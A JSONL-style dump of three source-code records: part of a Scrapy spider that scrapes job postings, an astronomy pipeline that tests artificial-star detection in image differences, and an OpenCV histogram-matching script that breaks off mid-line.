unicode('工作地点', 'utf-8'): 'location',\n unicode('更新时间', 'utf-8'): 'date',\n }\n\n def parse(self, response):\n selector = Selector(response)\n if not self.expected_job_count_set:\n job_count = selector.xpath('//td[@class=\"totalrow\"]/text()').re(self.Job_Count)\n if job_count:\n self.expected_job_count = job_count\n\n tableheads = selector.xpath(\n '//table[@class=\"standardtable\"]/thead/tr/th/text()').extract()\n meta_xpaths = {}\n for th in tableheads:\n if th in self.item_map:\n meta_xpaths[self.item_map[th]] = \"./td[\" + str(\n tableheads.index(th)+1)+\"]//text()\"\n\n jobs = selector.xpath('//table[@class=\"standardtable\"]//tr')\n for job in jobs:\n url = job.xpath('./td[1]/a/@href').extract()\n if url:\n meta = {}\n for mx in meta_xpaths:\n meta[mx] = job.xpath(meta_xpaths[mx]).extract()\n yield Request(\n callback=self.parse_job_callback(),\n meta=meta,\n url=url[0]\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n details_xpath = '//li[contains(text(), \"%s\")]/span/text()'\n\n loader.add_xpath(\n 'baseSalary', details_xpath % unicode('职位薪资:', 'utf-8')\n )\n loader.add_xpath(\n 'description',\n [\n '//h3[contains(text(), \"%s\")]' % unicode('职位要求', 'utf-8'),\n '//div[@class=\"positiondescription\"]',\n ]\n )\n loader.add_xpath(\n 'educationrequirements',\n details_xpath % unicode('学历要求:', 'utf-8 ')\n )\n loader.add_xpath(\n 'experiencerequirements',\n details_xpath % unicode('工作经验:', 'utf-8')\n )\n loader.add_xpath('jobtype', details_xpath % unicode('工作性质:', 'utf-8'))\n\n loader.add_value(\n 'date', response.meta.get('date'), ConvertDateString('%Y-%m-%d')\n )\n loader.add_value(\n 'referencenumber', response.url,\n Prefix('%s-' % self.name), re=self.Ref_Num\n )\n loader.add_value('location', response.meta.get('location'))\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/hxsdjobs.py","file_name":"hxsdjobs.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"375352438","text":"description=\"---- all check for artstar G184098(case:add artstar in date image not ref image)\"\n'''\n#############################################################################\n'''\nimport sys,os,glob\nimport numpy as np\nimport datetime,time\nimport argparse\nimport subprocess\nimport pyfits\nfrom pyraf import iraf\nimport pylab\nimport zscale\nimport gw,gw_diff,gw_search,gw_rank,gw_mask,gw_all,gw_stamp,gw_look\nimport shutil\nfrom numpy import *\n\nif __name__ == \"__main__\":\n\n start_time = time.time()\n\n parser = argparse.ArgumentParser(description=description,\\\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"trigger\",help=\"trigger name\",choices=[\"G184098\",\n \"G211117\"])\n parser.add_argument(\"filter\",help=\"filter\",choices=[\"g\",\"r\",\"i\"])\n parser.add_argument(\"-b\", \"--badpix_lim\",type=float,nargs=2,\n dest='badpix_lim',help='Bad pixel mask limit ?') \n parser.add_argument(\"-c\", \"--clobber\",action=\"store_true\",\n dest='clobber',default=False,help='CLobber existing files') \n parser.add_argument(\"-x\", \"--xtasks\",dest='xtasks',default='mdsrg',\n help='run m-ask, d-iff, s-earch, r-ank, g-lobal, j-udge, f-ind ')\n parser.add_argument(\"-t\", \"--threshold\",dest=\"threshold\",default=3,\n help='sextractor threshold')\n parser.add_argument(\"-v\", 
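Annotation: the spider above extracts its reference number with the compiled Ref_Num pattern; a two-line check confirms it against the sample job URL in the docstring. One nit: the unescaped dot in ".htm" matches any character (so "positionid-30385Xhtm" would also pass); r"\.htm" would be stricter.

import re

Ref_Num = re.compile(r"positionid-(\d+).htm")   # same pattern as the spider
url = "http://job.hxsd.com/companylist/info-positionid-30385.html"
print(Ref_Num.search(url).group(1))             # '30385'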
\"--verbose\",dest=\"verbose\",action=\"store_true\",\\\n default=False,help='Enable task progress report')\n\n args = parser.parse_args()\n\n####################################################\ndef gw_stamps(datain,dataou,trigger,filtro,pointing,all_list,xc,yc,cuts,\\\n size,directory,maglist,exp,dist,number):\n\n date_new = list(all_list.keys())[0]\n mag = maglist[dist][date_new]\n if mag == 'out':\n f1 = '_'.join(['diff','art',trigger,filtro,date_new.replace('-',''),\n all_list[date_new].replace('-',''),pointing])\n ffcat = '_'.join(['art',trigger,filtro,date_new.replace('-',''),\n pointing])\n else:\n f1 = '_'.join(['diff','art',trigger,filtro,date_new.replace('-',''),\n all_list[date_new].replace('-',''),pointing+'.add',mag])\n ffcat = '_'.join(['art',trigger,filtro,date_new.replace('-',''),\n pointing+'.add',mag])\n\n imgnew = pyfits.open(dataou+directory+date_new+'/'+pointing+'/'+str(exp)+'/'+str(dist)+'/'+f1+'.fits')\n xdim = imgnew[0].header['NAXIS1']\n ydim = imgnew[0].header['NAXIS2']\n\n print('coords x=%.2f y=%.2f' % (xc,yc))\n\n _xycoo = iraf.wcsctran(input=\"STDIN\",output=\"STDOUT\",\\\n Stdin=[str(xc)+' '+str(yc)],Stdout=1,image=\\\n dataou+directory+date_new+'/'+pointing+'/'+\\\n str(exp)+'/'+str(dist)+'/'+ffcat+'.fits',\n inwcs='logical',outwcs='world',column=\"1 2\")[3:]\n coo = _xycoo[0].split()\n x1,x2 = int(xc-size/2.),int(xc+size/2.)\n y1,y2 = int(yc-size/2.),int(yc+size/2.)\n if x1 < 1: x1,x2 = 1,1+size\n if y1 < 1: y1,y2 = 1,1+size\n if x2 > xdim: x1,x2 = xdim-1-size,xdim\n if y2 > ydim: y1,y2 = ydim-1-size,ydim\n\n imglist,dimglist,bpmlist = {},{},{}\n scolist,dralist,ddeclist,catonelist,numlist = {},{},{},{},{}\n N,scolist[0] = 0,-9999\n belong = False\n\n for dd in all_list:\n fdir_n = dataou+directory+dd+'/'+pointing+'/'+str(exp)+'/'+str(dist)+'/'\n _im ='_'.join(['diff','art',trigger,filtro,dd.replace('-',''),all_list[dd].replace('-',''),pointing+'.add', maglist[dist][dd]])\n\n dimglist[dd] = pyfits.open(fdir_n+_im+'.fits')\n bpmlist[dd] = pyfits.open(fdir_n+_im+'.bpm.fits')\n imglist[dd] = pyfits.open(dataou+directory+dd+'/'+pointing+'/'+str(exp)+'/'+str(dist)+'/'+'_'.join(['art',trigger,filtro,dd.replace('-',''),pointing+'.add',maglist[dist][dd]])+'.fits')\n \n fcat = dataou+directory+dd+'/'+pointing+'/'+str(exp)+'/'+str(dist)+'/'+'_'.join(['dcat','art',trigger,filtro,dd.replace('-',''),all_list[dd].replace('-',''),pointing+'.add',maglist[dist][dd]])+'.fits'\n\n if not os.path.exists(fcat): continue\n pid = subprocess.Popen([\"stilts\",\"tpipe\",\"in=\"+fcat,\"ofmt=ascii\",\n \"cmd=sort -down Ranking\"],stdout=subprocess.PIPE) \n output,error = pid.communicate()\n\n _catalog = output.split(\"\\n\")\n header = _catalog[0][1:].split()\n# print enumerate(sorted(imglist.keys())),sorted(imglist.keys())\n# print imglist.keys()\n# raw_input('...')\n\n catalog = {}\n for h in header:\n catalog[h] = []\n for j,h in enumerate(header):\n for i in range(1,len(_catalog)-1):\n entry = _catalog[i].split()[j]\n if h in ['X_IMAGE_1','Y_IMAGE_1', 'X_WORLD_1','Y_WORLD_1',\\\n 'Ranking']: \n catalog[h].append(float(entry))\n elif entry != '\"\"': catalog[h].append(entry)\n else: catalog[h].append(NaN)\n for h in header:\n catalog[h] = array(catalog[h])\n\n ii = where((abs(catalog['X_IMAGE_1']-xc)<20.)\\\n &(abs(catalog['Y_IMAGE_1']-yc)<20.))\n\n if len(ii[0])==0: \n print(' ',dd,'not in catalog')\n continue\n\n catone = {}\n for h in header: \n catone[h] = catalog[h][ii] \n\n lx = catone['X_IMAGE_1'][0]\n ly = catone['Y_IMAGE_1'][0]\n dra = catone['X_WORLD_1'][0]\n ddec = 
catone['Y_WORLD_1'][0]\n# ra = iraf.clDms(dra/15.,digits=3)\n# dec = iraf.clDms(ddec,digits=2)\n search = catone['search'][0]\n score = catone['Ranking'][0]\n N+=1\n# epoch[N]=dnew\n belong = True\n\n scolist[N]=score \n if scolist[N] >= scolist[N-1]: \n scolist[N] = score\n# print score,N\n# raw_input('...')\n dralist[N]=dra\n ddeclist[N]=ddec\n catonelist[N]=catone\n numlist[N]=ii[0][0]+1\n print('found %d: %s n=%-4d x=%.2f y=%.f %d (%s)' % (N,dd,numlist[N],lx,ly,score,_im))\n# print scolist,dralist\n# imgref = pyfits.open(datain+trigger+'/'+all_list[dd]+'/'+\\\n# trigger+\"_VST_\"+filtro+\"_\"+all_list[dd].replace('-','')+\"_\"+pointing+'.fits')\n\n f2 = '_'.join(['art',trigger,filtro,all_list[dd].replace('-',''),pointing])\n imgref = pyfits.open(datain+directory+all_list[dd]+'/'+pointing+'/'+str(exp)+'/'+f2+'.fits')\n\n pylab.ion()\n pylab.figure(figsize=(8,8)) \n\n nstamp = 5\n step = 1/float(nstamp) \n xsize,ysize = step,step\n\n pylab.subplots_adjust(wspace=0.0001,hspace=0.0001,bottom=.01,top=0.99,\\\n left=0.01,right=0.99)\n\n pylab.subplot(111)\n\n ra = iraf.clDms(float(coo[0])/15.,digits=3)\n dec = iraf.clDms(float(coo[1]),digits=2)\n\n if belong == True:\n\n xx = sorted(list(scolist.items()),key=lambda scolist:scolist[0])\n NN = xx[-1][0]\n print('showing with highest score: N=', NN,'score=',xx[-1][1])\n catone=catonelist[NN]\n score = scolist[NN]\n dra=dralist[NN]\n ddec=ddeclist[NN]\n _num = numlist[NN]\n\n# sys.exit()\n pylab.figtext(.05,.95,'#artstar %d %s %s dist=%.4f exp%i %i/50' %\\\n (_num,trigger,pointing,float(dist),float(exp),float(number)),fontsize='x-large')\n\n pylab.figtext(.05,.92,' %s ra=%.2f dec=%.2f score=%s ' %\\\n (search,dra,ddec,score),fontsize='x-large')\n \n\n yl = 0.89\n pylab.figtext(.05,yl,' %12s %12s %7s %7s %8s %8s %7s ' \\\n % (' xc ',' yc ',' fwhm ','fluxrad','isoarea',\\\n 'mag auto','cl star'))\n pylab.figtext(0.83,yl,'rgood')\n\n lab = ['dif','new','ref']\n klab = ['_1','_2','']\n for k in klab:\n if not isnan(float(catone['X_IMAGE'+k][0])):\n _x = float(catone['X_IMAGE'+k][0])\n _y = float(catone['Y_IMAGE'+k][0])\n fwhm = float(catone['FWHM_IMAGE'+k][0])\n fluxrad = float(catone['FLUX_RADIUS'+k][0])\n isoarea = float(catone['ISOAREA_IMAGE'+k][0])\n magauto = float(catone['MAG_AUTO'+k][0])\n rgood = float(catone['rgood'][0])\n classtar = float(catone['CLASS_STAR'+k][0])\n yl += -.03\n# print lab[klab.index(k)], _x,_y,fwhm,fluxrad,isoarea,magauto, rgood,classtar\n \n pylab.figtext(.05,yl,\\\n '%-4s %9.2f %9.2f %7.2f %7.2f %8.2f %7.2f %7.2f' %\\\n (lab[klab.index(k)],_x,_y,fwhm,fluxrad,isoarea,magauto,classtar))\n\n pylab.figtext(0.83,0.83,'%5.2f dif' % rgood)\n\n else:\n pylab.figtext(.05,.92,'artstar RA=%10s DEC=%10s dist=%.4f exp%i %i/50 ' %\\\n (ra,dec,float(dist),float(exp),float(number)),fontsize='x-large')\n# pylab.figtext(.05,.98,' RA='+ra+' DEC='+dec+' input',fontsize=18)\n pylab.figtext(.05,.86,'not in our catalog', fontsize=24)\n pylab.figtext(.05,.82,' x=%.2f y=%.2f' %(xc,yc),fontsize=18)\n pylab.figtext(.05,.89,' %.7f %.7f ' %\\\n (float(coo[0]),float(coo[1])),fontsize='x-large')\n\n for i,e in enumerate(sorted(imglist.keys())):\n\n _img = imglist[e][0].section[y1:y2,x1:x2]\n if cuts: z1,z2 = cuts[1:-1].split(',')\n else: \n z1,z2 = zscale.zscale(_img)\n print(\"cuts for\",dd,' z1=',z1,\" z2=\",z2)\n pylab.subplot(5,5,5+i+1) \n imgshow = pylab.imshow(_img[::-1],cmap=pylab.cm.gray_r,\\\n vmin=int(z1),vmax=int(z2))\n pylab.text(0,0,e,fontsize=14)\n frame1 = pylab.gca()\n frame1.axes.get_xaxis().set_visible(False)\n 
frame1.axes.get_yaxis().set_visible(False)\n \n _img = imgref[0].section[y1:y2,x1:x2]\n if not cuts: z1,z2 = zscale.zscale(_img)\n pylab.subplot(5,5,15) \n imgshow = pylab.imshow(_img[::-1],cmap=pylab.cm.gray_r,\\\n vmin=int(z1),vmax=int(z2))\n pylab.text(0,0,all_list[dd],fontsize=14)\n frame1 = pylab.gca()\n frame1.axes.get_xaxis().set_visible(False)\n frame1.axes.get_yaxis().set_visible(False)\n\n for i,e in enumerate(sorted(dimglist.keys())):\n _img = dimglist[e][0].section[y1:y2,x1:x2]\n z1,z2 = zscale.zscale(_img)\n pylab.subplot(5,5,15+i+1) \n imgshow = pylab.imshow(_img[::-1],cmap=pylab.cm.gray_r,\\\n vmin=int(z1),vmax=int(z2))\n\n frame1 = pylab.gca()\n frame1.axes.get_xaxis().set_visible(False)\n frame1.axes.get_yaxis().set_visible(False)\n pylab.text(0,0,'d'+e,fontsize=14)\n \n for i,e in enumerate(sorted(bpmlist.keys())):\n _img = bpmlist[e][0].section[y1:y2,x1:x2]\n pylab.subplot(5,5,20+i+1) \n imgshow = pylab.imshow(_img[::-1],cmap=pylab.cm.gray_r,\\\n vmin=90,vmax=100)\n\n frame1 = pylab.gca()\n frame1.axes.get_xaxis().set_visible(False)\n frame1.axes.get_yaxis().set_visible(False)\n pylab.text(0,0,'d'+e,fontsize=14)\n \n verbose=True\n answ=\"-\"\n while answ[0]!='q':\n answ = input(\">> #, d-iff or ob-j lightcurve or q-uit:\")\n if len(answ)>0: \n if answ in 'do':\n if belong == False: search='P'\n if answ in 'd':ii=14\n else:ii=12 \n ff = open('_sn.coo','w')\n ff.write(str(xc)+\" \"+str(yc))\n ff.close()\n ph,mag,merr = gw_look.gw_lightcurve(all_list,\\\n trigger,filtro,pointing,\\\n answ,search,optlist,verbose)\n gw_plotlc(ph,mag[0],merr[0],ii)\n else: answ='q'\n\ndef gw_plotlc(ph,mag,merr,i):\n \n pylab.subplot(5,5,i)\n ph = array(ph)-min(ph)\n apmag,apmerr = array(mag),array(merr)\n ii = where(apmerr>0)\n if len(ii[0])>0:\n pylab.errorbar(ph[ii],apmag[ii],yerr=apmerr[ii],fmt='ob')\n ie = where(apmerr==-1)\n if len(ie[0])>0:\n yerrl = zeros(len(ie[0]))-.3\n yerru = zeros(len(ie[0]))\n pylab.errorbar(ph[ie],apmag[ie],yerr=[yerrl,yerru],\\\n uplims=True,fmt='ob') \n\n if len(apmag): pylab.ylim(max(apmag)+.1,min(apmag)-.1)\n else: pylab.ylim(27,20)\n pylab.tick_params(axis='y',direction='in',pad=-15)\n pylab.xlim(min(ph)-10,max(ph)+5)\n if len(apmag): pylab.ylim(max(apmag)+.4,min(apmag)-.4) # guard: apmag can be empty\n\n\n###################################################\nif __name__ == \"__main__\":\n\n datain = os.path.expandvars(\"$gw_datain\") \n dataou = os.path.expandvars(\"$gw_dataou\") \n\n optlist = gw.read_default()\n optlist['hotpants']['nrx'], optlist['hotpants']['nry'] = '1','1'\n trigger = args.trigger\n filtro = args.filter\n all_list, maglist = {}, {}\n areclist = open('record_all_list','w')\n areclist.write('#gw_all %s %s \\n' % (trigger, filtro))\n# areclist.write('#action exp data pointing (magnitude) timespend \\n')\n reclist=open('record_list')\n aa = reclist.readlines()\n for bb in aa:\n if bb[0]=='c':\n line = bb.split(';')\n nexp,dd,pp,mag,zgw = [],[],[],[],[]\n input(line) # debug pause: press Enter to continue\n for i in range(len(line)):\n ele = line[i].split()\n for j in range(len(ele)):\n if ele[j] == 'copy':\n nexp.append(ele[j+1])\n dd.append(ele[j+2])\n pp.append(ele[j+3])\n zgw.append(ele[j+4])\n if ele[j+4] == 'ref': mag.append('None')\n elif ele[j] == 'addstar':\n mag.append(ele[j+4])\n _p,_d,_r = unique(pp)[0],unique(dd)[0],unique(dd)[1]\n if _p not in all_list: all_list[_p] = {}\n all_list[_p][_d] = _r\n\n for i in range(len(zgw)):\n if zgw[i] not in maglist: maglist[zgw[i]] = {}\n maglist[zgw[i]][_d] = mag[i]\n elif bb[0]=='@':directory = bb.split('@')[1]\n\n exp = len(unique(nexp))\n input(exp) # debug pause: press Enter to continue\n zgw1=[]\n for rs 
in zgw:\n if rs != 'ref':\n zgw1.append(rs)\n\n for i in range(0,exp):\n for _p in sorted([int(x[1:]) for x in all_list]):\n p = 'p'+str(_p)\n for d in sorted(all_list[p]):\n dnew = d\n dref = all_list[p][d]\n\n for rs in zgw1:\n # create mask\n if 'm' in args.xtasks: \n for d in [dnew, dref]:\n if d == dnew: case = 'new'\n else:case = 'ref'\n print('MASK',case,trigger,filtro,d,p,rs,maglist[rs][dnew],i)\n areclist.write(' '.join(['MASK',trigger,filtro,d,p,rs,maglist[rs][dnew],str(i)])+'\\n')\n message = gw_mask.gw_bpm(dataou,dataou,trigger,filtro,d,p, optlist,args.badpix_lim,args.clobber,args.threshold,args.verbose,True,case,str(i),maglist[rs][dnew],rs,directory)\n print(message)\n \n print(25*\" \"+\"time span\",int(time.time()-start_time),\"sec\")\n\n # compute difference\n if 'd' in args.xtasks: \n print('DIFF',trigger,filtro,dnew,dref,p,rs,i)\n areclist.write(' '.join(['DIFF',trigger,filtro,dnew,dref,p,rs,maglist[rs][dnew],str(i)])+'\\n')\n gw_diff.gw_diff(dataou,dataou,trigger,filtro,dnew,dref,p, optlist,args.clobber,args.verbose,True,str(i),maglist[rs][dnew],rs,directory)\n\n print(25*\" \"+\"time span\",int(time.time()-start_time),\"sec\")\n\n # search candidates\n if 's' in args.xtasks: \n print('SEARCH',trigger,filtro,dnew,dref,p,rs,i)\n areclist.write(' '.join(['SEARCH',trigger,filtro,dnew,dref,p,rs,maglist[rs][dnew],str(i)])+'\\n')\n gw_search.gw_search(dataou,dataou,trigger,filtro,dnew,dref,p,optlist,'b',args.clobber,args.verbose,True,str(i),maglist[rs][dnew],rs,directory) \n print(25*\" \"+\"time span\",int(time.time()-start_time),\"sec\") \n\n # rank candidates\n if 'r' in args.xtasks: \n print('RANK',trigger,filtro,dnew,dref,p,rs,i)\n areclist.write(' '.join(['RANK',trigger,filtro,dnew,dref,p,rs,maglist[rs][dnew],str(i)])+'\\n')\n gw_rank.gw_rank(dataou,trigger,filtro,dnew,\\\n dref,p,args.clobber,args.verbose,True,\\\n str(i),maglist[rs][dnew],rs,directory)\n print(25*\" \"+\"time span\",int(time.time()-start_time),\"sec\")\n\n for i in range(0,exp):\n for _p in sorted([int(x[1:]) for x in all_list]):\n p = 'p'+str(_p)\n for rs in zgw1:\n # global merge\n if 'g' in args.xtasks: \n print('global merge',trigger,filtro,p,rs)\n areclist.write(' '.join(['GLOBAL',trigger,filtro,dnew,dref,p,rs,str(i)])+'\\n')\n gw_all.gw_global_rank(dataou,trigger,filtro,all_list,\\\n args.verbose,True,str(i),maglist,rs,directory)\n print(25*\" \"+\"time span\",int(time.time()-start_time),\"sec\")\n reclist.close()\n # all merge\n# print 'all merge',trigger,filtro,dnew,dref,p\n# gw_all.gw_all_rank(dataou,trigger,filtro,all_list,\\\n# args.score,args.clobber,args.verbose,True,\\\n# str(i),maglist[dnew])\n# print 25*\" \"+\"time span\",int(time.time()-start_time),\"sec\"\n\n fnew = dataou+directory+'artlist_'+p+'.asc'\n shutil.copy('_artlist',fnew)\n if 'j' in args.xtasks: \n if not os.path.exists(dataou+directory+'cresult'):\n os.mkdir(dataou+directory+'cresult')\n for nexp in range(0,exp):\n for _p in sorted([int(x[1:]) for x in all_list]):\n p = 'p'+str(_p)\n ffww = open(dataou+directory+'cresult/cresult_'+p+'.asc','w')\n ffww.write('#dist tot pos \\n')\n for rs in zgw1:\n print('judge',trigger,filtro,p,rs,nexp)\n ffww.write(rs+' ')\n ## read _artliat\n wfile = open('tmp_judge.asc','w')\n wfile.write('#X_IMAGE Y_IMAGE TYPE\\n')\n in1 = dataou+directory+\"global_art_\"+trigger+\"_\"+filtro+\"_\"+p+\"_\"+str(nexp)+\"_\"+str(rs)+'.fits'\n readlist=open(fnew)\n aa = readlist.readlines()\n for bb in aa: \n try:\n wfile.write((bb.split()[0]+' '+bb.split()[1]+' '+bb.split()[3]+'\\n'))\n except:\n 
wfile.close()\n gw.stilts_run(\"stilts tpipe tmp_judge.asc ifmt=ascii out=tmp_judge.fits\",'transfer to fits',True)\n in2 = 'tmp_judge.fits'\n## 3 arcsec\n rad = 1/0.21\n gw.stilts_run(\"stilts tmatch2 in1=\"+in1+\\\n \" matcher=2d params=\"+str(rad)+ \" values1='X_IMAGE_1 Y_IMAGE_1' in2=\"+in2+\\\n \" values2='X_IMAGE Y_IMAGE' out=tmp_merged_judge_\"+str(p)+'_'+str(rs)+'_'+\\\n str(nexp)+\".fits\"+\" join=all2 find=best2\",'cross checking',True)\n\n gw.stilts_run(\"stilts tpipe cmd='replacecol Separation \"+\\\n \" 0.21*sqrt(pow(X_IMAGE_1-X_IMAGE_2a,2)+pow(Y_IMAGE_1-Y_IMAGE_2a,2))'\"+\\\n \" in=tmp_merged_judge_\"+str(p)+'_'+str(rs)+'_'+str(nexp)+\".fits\"+\\\n \" out=\"+dataou+directory+\"global_merged_\"+str(p)+'_'+str(rs)+'_'+\\\n str(nexp)+\".fits\",'Compute separation from reference',True)\n \n gw.stilts_run(\"stilts tpipe in=tmp_merged_judge_\"+\\\n str(p)+'_'+str(rs)+'_'+str(nexp)+\".fits out=tmp_merged_judge_\"+\\\n str(p)+'_'+str(rs)+'_'+str(nexp)+\".asc ofmt=ascii\",\"to ascii\",True)\n\n ff = open('tmp_merged_judge_'+str(p)+'_'+str(rs)+'_'+str(nexp)+'.asc')\n ffw = open(dataou+directory+'cresult/cresult_'+str(p)+'_'+str(rs)+'_'+str(nexp)+'.asc','w')\n ffw.write('check result for '+str(trigger)+' '+str(p)+' '+str(rs)+' '+str(nexp)+'\\n')\n ffw.write('#X Y rank dist type (gid dis) \\n')\n head = ff.readline()\n righe = ff.readlines()\n nrank, ndist, tpd, fin= 0,0,[],{}\n for r in righe:\n if len(head.split())==114:\n ximg = r.split()[-4]\n yimg = r.split()[-3]\n rank = r.split()[-7]\n dist = r.split()[-1]\n typ = r.split()[-2]\n gid = ''\n gis = ''\n elif len(head.split())==116:\n ## group found, including gid,gis\n ximg = r.split()[-6]\n yimg = r.split()[-5]\n rank = r.split()[-9]\n dist = r.split()[-1]\n typ = r.split()[-4]\n gid = r.split()[-3]\n gis = r.split()[-2]\n else:\n print('fits size error!!!')\n sys.exit()\n \n ffw.write(' '.join([ximg,yimg,rank,dist,typ,gid,gis,'\\n']))\n if dist != '\"\"' and float(dist) < 0.5:\n ndist+=1\n if rank != '\"\"' and float(rank) > 0:nrank+=1\n if dist != '\"\"':tpd.append(typ)\n # count matched candidates per type\n for i in range(len(unique(tpd))):\n cnt=0\n for j in range(len(tpd)):\n if tpd[j]==unique(tpd)[i]:\n cnt+=1\n fin[unique(tpd)[i]]=cnt\n ffw.write('\\n'+'within 0.5:'+str(ndist)+' positive:'+str(nrank)+'\\n'+str(fin))\n ffww.write(str(ndist/40.)+' '+str(nrank/40.)+'\\n')\n ffw.close()\n ffww.close()\n\n\n # stamp art star\n if 'f' in args.xtasks: \n for i in range(0,exp):\n for _p in sorted([int(x[1:]) for x in all_list]):\n p = 'p'+str(_p)\n f1 = dataou+directory+'artlist_'+p+'.asc'\n readlist=open(f1)\n aa = readlist.readlines()\n number,coo1,coo2,nn=[],[],[],1\n for bb in aa:\n number.append(nn)\n try:\n coo1.append(bb.split()[0])\n coo2.append(bb.split()[1])\n except:continue\n nn+=1\n\n answ,answ1=\"-\",\"-\"\n while answ[0]!='q':\n answ = input(\">> #number of artstar to show,[0,50], or q-uit:\")\n if len(answ)>0: \n if '#' in answ:\n nn = int(answ[1:])\n if nn >= 50 or nn <= 0:\n answ='q'\n print('out of range')\n else:\n print(int(answ[1:]),'of 50 chosen'+'\\n'+'*'*50+'\\n')\n print('coordinates:',coo1[nn],coo2[nn])\n for ii in range(len(zgw1)):\n print(ii,zgw1[ii])\n answ1 = input(\">> And the #distance, or q-uit:\")\n if len(answ1)>0:\n if '#' in answ1:\n try:\n rs = zgw1[int(answ1[1:])] \n print(rs,'chosen'+'\\n'+'*'*50+'\\n')\n except:\n sys.exit()\n for d in range(len(number)):\n if int(number[d]) == nn:\n xc,yc = coo1[d],coo2[d]\n gw_stamps(dataou,dataou,trigger,filtro,p,all_list[p],float(xc),float(yc), False,50,directory,maglist,i,rs,number[d])\n 
else:sys.exit()\n else:sys.exit()\n else:sys.exit()\n else: sys.exit()\n sys.exit()\n\n\n trash = glob.glob('tmp*') # remove temporary files\n for t in trash: os.remove(t)\n\n message = \"******* Completed in \"+str(int(time.time()-start_time))+\" sec\" \n print(message)\n","sub_path":"bin/gw_all_artcheck.py","file_name":"gw_all_artcheck.py","file_ext":"py","file_size_in_byte":25139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"83374308","text":"# Authors: CS-World Domination Summer19 - DM\r\nimport cv2 as cv\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport os\r\nimport os.path\r\nimport shutil\r\n\r\n# NOTE: The helper function hist_match is taken directly from the following stackoverflow post. \r\n# Apparently there are no libraries that do color-histogram matching.\r\n# https://stackoverflow.com/questions/32655686/histogram-matching-of-two-images-in-python-2-x\r\n# \r\n# The link below is also probably worth taking a look at, if you want to use MATLAB's matching function instead.\r\n# https://www.mathworks.com/help/matlab/matlab-engine-for-python.html?searchHighlight=python&s_tid=doc_srchtitle\r\n\r\n\r\ndef histBGR(file):\r\n \"Press space for color-intensity histogram of the image's bgr values\"\r\n image = cv.imread(file, 1) # -1 alpha, 0 gray, 1 color\r\n while True:\r\n k = cv.waitKey(10) & 0xFF\r\n k_char = chr(k)\r\n if k_char == ' ':\r\n print(\"Displaying histogram!\")\r\n color = ['b','g','r']\r\n for i,col in enumerate(color):\r\n histr = cv.calcHist([image],[i],None,[256],[0,256])\r\n # NOTE: Using an argument other than None lets you creates a hist for a specified section of the image\r\n plt.plot(histr,color = col)\r\n plt.xlim([0,256])\r\n plt.show()\r\n # Display the resulting image\r\n cv.imshow(file, image)\r\n # End the Video Capture\r\n if k == 27: # ESC key, See https://keycode.info for other keycodes\r\n print(\"Closed image windows!\")\r\n break\r\n cv.destroyWindow(file)\r\n return\r\n\r\ndef histEqual(file):\r\n \"Returns the image result of equalizehist: makes the Equalized Data more spread out than Original Data\"\r\n image = cv.imread(file, 0) # -1 alpha, 0 gray, 1 color\r\n EQimage = cv.equalizeHist(image) # Equalization only works with grayscale images\r\n while True:\r\n k = cv.waitKey(10) & 0xFF\r\n k_char = chr(k)\r\n if k_char == ' ':\r\n print(\"Displaying histogram!\")\r\n hist1 = cv.calcHist([image],[0],None,[256],[0,256])\r\n hist2 = cv.calcHist([EQimage],[0],None,[256],[0,256])\r\n line2, = plt.plot(hist2,label=\"Equalized Data\",color='brown')\r\n line1, = plt.plot(hist1,label=\"Original Data\",color='black',linestyle='dashed')\r\n first_legend = plt.legend(handles=[line2], loc=1)\r\n ax = plt.gca().add_artist(first_legend)\r\n plt.legend(handles=[line1], loc=4)\r\n plt.xlim([0,256])\r\n plt.show()\r\n # Display the resulting image\r\n cv.imshow(file, image)\r\n cv.imshow(\"EQ_\"+file, EQimage)\r\n # Close open image windows\r\n if k == 27: # ESC key, See https://keycode.info for other keycodes\r\n print(\"Closed image windows!\")\r\n break\r\n cv.destroyWindow(file)\r\n cv.destroyWindow(\"EQ_\"+file)\r\n return EQimage\r\n\r\ndef histColorMatch(srcFile, tempFile):\r\n \"Only works on grayscale, matches the color histogram of srcFile to tempFile's color histogram\"\r\n # NOTE: See https://en.wikipedia.org/wiki/Histogram_matching for a description of this algorithm\r\n imageSrc = cv.imread(srcFile, 0) # -1 alpha, 0 gray, 1 color\r\n imageTemp = cv.imread(tempFile, 0) 
# -1 alpha, 0 gray, 1 color\r\n imageMatch = hist_match(imageSrc, imageTemp).astype(np.uint8)\r\n while True:\r\n k = cv.waitKey(10) & 0xFF\r\n k_char = chr(k)\r\n if k_char == ' ':\r\n print(\"Displaying histogram!\")\r\n hist1 = cv.calcHist([imageSrc],[0],None,[256],[0,256])\r\n hist2 = cv.calcHist([imageTemp],[0],None,[256],[0,256])\r\n hist3 = cv.calcHist([imageMatch],[0],None,[256],[0,256])\r\n line3, = plt.plot(hist3,label=\"MatchResult Data\",color='blue')\r\n line2, = plt.plot(hist2,label=\"Template Data\",color='red')\r\n line1, = plt.plot(hist1,label=\"Source Data\",color='black')\r\n first_legend = plt.legend(handles=[line2], loc=1)\r\n ax = plt.gca().add_artist(first_legend)\r\n plt.legend(handles=[line1], loc=4)\r\n plt.xlim([0,256])\r\n plt.show()\r\n # Display the resulting image\r\n cv.imshow(\"srcFile\", imageSrc)\r\n cv.imshow(\"tempFile\", imageTemp)\r\n cv.imshow(\"matchResult\", imageMatch)\r\n # End the Video Capture\r\n if k == 27: # ESC key, See https://keycode.info for other keycodes\r\n print(\"Closed image windows!\")\r\n break\r\n cv.destroyAllWindows()\r\n return\r\n\r\ndef hist_match(source, template):\r\n # NOTE: This function was taken from the stack overflow post\r\n oldshape = source.shape\r\n source = source.ravel()\r\n template = template.ravel()\r\n\r\n # get the set of unique pixel values and their corresponding indices and\r\n # counts\r\n s_values, bin_idx, s_counts = np.unique(source, return_inverse=True, return_counts=True)\r\n t_values, t_counts = np.unique(template, return_counts=True)\r\n\r\n # take the cumsum of the counts and normalize by the number of pixels to\r\n # get the empirical cumulative distribution functions for the source and\r\n # template images (maps pixel value --> quantile)\r\n s_quantiles = 